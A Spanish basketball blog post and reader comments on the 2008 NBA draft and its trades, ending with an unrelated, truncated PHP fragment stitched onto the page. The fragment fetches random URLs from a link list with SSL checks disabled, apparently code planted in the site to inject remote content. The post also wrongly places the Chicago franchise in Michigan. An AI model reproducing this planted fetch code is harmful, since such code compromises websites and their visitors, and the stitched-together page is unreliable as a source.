Noche de draft, noche de emociones

27 de June de 2008 por txusma

El día después del draft de la NBA es uno de mis preferidos. Mientras estudias las diferentes elecciones y piensan en las posible implicaciones van llegando las confirmaciones de traspasos, muchas veces auténticas sorpresas inesperadas. Este año no ha sido una excepción y a las típicas sorpresas y decepciones de las elecciones del draft se une una larga y jugosa lista de movimientos que implican a jugadores llamados a ser futuras estrellas de la liga. Repasamos la situación de los equipos que más se han movido después de la noche del 26 de junio:

– Chicago Bulls: Finalmente y como se preveía han elegido a Derrick Rose por delante de Michael Beasley a pesar de la falta de anotación interior de la franquicia de Michigan. La llegada de Rose puede comportar la salidad de Hinrich, Ben Gordon o ambos por lo que no se descartan movimientos en este sentido. Recordemos que en los días previos se ha hablado mucho de un posible traspaso con los Miami Heat que acabaría con Dwyane Wade vestido de rojo, traspaso que todavía no se ha de olvidar del todo. También se ha hecho con los servicios de Omer Asik, pívot turco de 22 años.

– Miami Heat: Escogido Rose, y a pesar de la admiración profesada por OJ Mayo, los Heat se han hecho finalmente con Michael Beasley, cortando de un plumazo cualquier rumor que indicaba que podría haber un traspaso antes del draft para bajar una o dos posiciones. Marion, Beasley y Haslem forman ahora un juego interior atípico pero contundente. Además se ha hecho con los servicios de Mario Chalmers, el base que dió la victoria a Kansas con un triple en los últimos segundos de la final de la NCCA.

– Minnessota Timberwolves: McHale estaba enamorado (nunca mejor dicho) de Kevin Love pero hubiera sido un pecado no escoger a OJ Mayo. Finalmente, tras la elección del escolta, un traspaso con los Memphis Grizzlies ha acabado con Kevin Love y Mike Miller en la franquicia de los lobos a cambio principalmente del ex-jugador de los Trojans. Foye, Brewer, Miller, Love y Al Jefferson forman una base muy interesante.

– Seattle Supersonics: Tal vez escocidos con sus elecciones de pívots de temporadas anteriores (Robert Swift, Johan Petro, Sean Sene,…), esta vez los Sonics han pasado de los 2 mejores pívots de este draft y se han decidido por draftear a un base. Eran muchos los que pronosticaban la elección de Jerryd Bayless pero el elegido ha sido Russell Westbrook, base de UCLA, que ha protagonizado una ascensión meteórica desde que acabara la NCCA. Para no faltar a la tradición los Sonics se han hecho, eso sí, con Sergei Ibaka que no ha visto cumplido su deseo de salir elegido en segunda ronda del draft.

– Memphis Grizzlies: En un primer momento sus elecciones fueron Kevin Love y Donte Greene (que cayó hasta la elección 28, 10 por debajo de lo que le daban los mocks) pero en 2 movimientos posteriores han acabado traspasando a estos 2 jugadores y consiguiendo a OJ Mayo (con Mayo llegan también Jaric, Walker y Buckner) y Darrell Arthur y librándose de los contratos de Collins y Cardinal. Este movimiento puede implicar una fuerte confianza en Marc Gasol que tan solo encontrará a Darko Milicic como rival en el puesto de 5. El quinteto que se perfila para la temporada 2008/2009 seria el que formarían Conley, Mayo, Gay, Arthur y Gasol.

– New York Knicks: Finalmente no realizaron ningún trade para poder optar a OJ Mayo por lo que recurrieron a un plan B que también es de su agrado: la elección de Danilo Gallinari. Con Mike D’Antoni en el banquillo son de esperar traspasos que acaben con Eddie Curry y Zach Randolph fuera del equipo y con Gallinari jugando un rol importante.

– Los Angeles Clippers: La elección de Eric Gordon estaba cantada y así ha sido por lo que lo más interesante de su noche es la elección del que decían podía ser el nuevo Dwight Howard: DeAndre Jordan. En los primeros mocks aparecía entre los 10 primeros pero su nombre fue cayendo al comprobar los equipos que estaba muy, muy verde. Finalmente salió elegido en segunda ronda.

– Milwaukee Bucks: Nadie se sorprendió de la elección de Joe Alexander pero si de la llegada de Richard Jefferson a cambio del chino Yi Jianlian y Bobby Simmons. Como cada año un equipo con Mo Williams, Michael Redd, Richard Jefferson, Charlie Villanueva y Andrew Bogut deberia luchar sin problemas por entrar en los Playoffs del Este, pero con los Bucks todos hemos aprendido a no lanzar las campanas al vuelo.

– Charlotte Bobcats: Todo el mundo daba por segura la elección de Brook Lopez si es que llegaba hasta aquí pero, sorprendiendo a propios y extraños, finalmente se quedaron con el base DJ Augustine. Siendo Larry Brown el entrenador nos sorprendería que Augustine jugara un papel muy importante esta temporada. Para paliar sus necesidades en el juego interior han drafteado al pívot francés Alexis Ajinca que de workout en workout ha ido subiendo peldaños.

– New Jersey Nets: Seguro que nadie en los Nets confiaba en que les llegará un pívot puro como Brook Lopez pero así ha sido. Justo un jugador que viene a cubrir una de las más graves deficiencias del equipo. Además se han hecho con Yi Jianlian a cambio del veterano Richard Jefferson por lo que se puede intuir en un futuro la marcha también de Vince Carter y el carpetazo a una época irregular. Con la elección 21 se han hecho también con el ala-pívot Ryan Anderson conformando un juego interior con mucho futuro con Sean Williams, Brook Lopez, Ryan Anderson y probablemente, Nenad Krstic y en la segunda ronda han drafteado a Chris Douglas-Roberts, gran jugador que ha caído, inexplicablemente, muchas posiciones.

– Indiana Pacers: Uno de los equipos que más se han movido. En el número 11 eligieron a un jugador que ni en sus mejores sueños podian imaginar que les llegaría: Jarryd Bayless. De haberlo sabido es muy probable que no hubieran cerrado anteriormente el trade con los Toronto Raptors por el cual reciben a TJ Ford, Rasho Nesterovic y Maceo Baston (no la 17 como se comentaba en un principio) a cambio de Jermaine O’Neal y la elección 41. En todo caso han reaccionado rápido y parece ser que ya hay un acuerdo verbal con los Portland TrailBlazers para traspasar a Bayless y Diogu a cambio de Jarrett Jack, Josh McRoberts y el escolta Brandon Rush. De todas maneras, queda mucho trabajo que hacer en Indianápolis.

– Portland Trail Blazers: Como nos gusta observar que hay GMs con un plan en la cabeza. Kevin Protchar sigue añadiendo piezas a su puzzle ganador y en una noche muy productiva se ha hecho con los servicios de Jarryd Bayless y Nicolas Batum, dos jugadores que le irán como anillo al dedo. Bayless – Roy – Outlaw – Aldridge – Oden, con Batum, Rudy, Diogu, Fyre, Blake en el banquillo forman un equipo apasionante a lo que hay sumar una situación salarial maravillosa a partir del año que viene. La lástima es que parece que se le han acabado las oportunidades a Sergio Rodríguez.

Comenta

6 comentarios a esta entrada

  1. Dantley dice:
    #1

    Vaya sorpresones en el draft. El trade de Memphis-Minnesota es raro, raro porque Memphis tiene más problemas por dentro que por fuera y porque los Wolves tienen a Al Jefferson que en teoría juega en la posición de Love.

    Luego lo de Westbrook en el 4 parece una exageración. Augustin estando Brook López libre tampoco parece lógico. Ibaka con 4 años probablemente por delante en la ACB, bueno, hasta puede salir bien. Luego está Portland que sin grandes rondas se saca a Bayless (bye, bye, Sergio) y a Batum que lo tendrá en Francia.

    Y Jordan en 2ª ronda, no se ha fiado nadie de él y creo que bien que hacen

    Como dice Txusma, es un bonito día con tantos movimientos

      Citar

  2. TheDeerHunter dice:
    #2

    Más allá de los dos primeros que más o menos estaban claros y veremos lo que ahora van a demostrar, yo creo que el movimiento de la noche ha sido el de Portland.
    Muchos consideraban a Bayless como un top5 y ellos lo enganchan en el 13 cubriendo una de las posiciones más flojas que contaban. Lástima para Sergio pero no han mostrado ninguna fe con él, veremos con Rudy.
    El equipo queda cañerísimo y con margen salarial para parar un tren. Ahora la historia va a ser qué es lo que realmente son Oden, Bayless y Rudy en la NBA. Si son lo que se espera pueden caer anillos a cholón a partir de pronto.

      Citar

  3. Dantley dice:
    #3

    Es cierto, no había caido que además tienen el margen salarial. Va a estar bonito como acaba de armar el equipo Portland

      Citar

  4. Viva_Dirk dice:
    #4

    Los de Seattle cada vez lo hacen peor. Westbrook ni es base ni es para un Nº4, una locura con todas las letras. Jose, Portland tiene el hueco en el verano de 2009.

    Los Wolves y Blazers para mi los ganadores de la noche, aunque Memphis no me parece perdedor llevandose a OJ Mayo y quitandose contratos de los que matan a una franquicia.

    A ver como termina Chicago la plantilla….

      Citar

  5. Viva_Dirk dice:
    #5

    Pues tremendo lo de Pritchard, cada vez lo hace mejor, no habeis comentado que se ha hecho con un especialista defensivo como Dorsey.

    Robos: Jason Thompson, Brook Lopez, Bayless, Hibbert, Koufos, Darrell Arthur, Donte Green y Douglas-Roberts.

    Pifias: Westbrook, Hickson y Brandon Rush.

    De los robos evidentemente hablo de segun han sido drafteados, a mi Jason Thompson me parece muy bueno y físicamente brutal. Lopez y Bayless han caido pero a mi me gustan ambos, en Hibbert sigo confiando, Koufos con Sloan puede salir hecho un hombre y los otros 3 creo que en esas posiciones tan bajas van a rendir bastante.

    Lo de Westbrook como base sigo sin creermelo, aunque puede ser un base defensivo y muy físico en ataque un Nº4 me parece excesivo. Hickson no me gusta nada y Rush en el 13 creo que es precipitado, quedaba gente mejor detrás.

      Citar

  6. planetbasket.net dice:
    #6

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>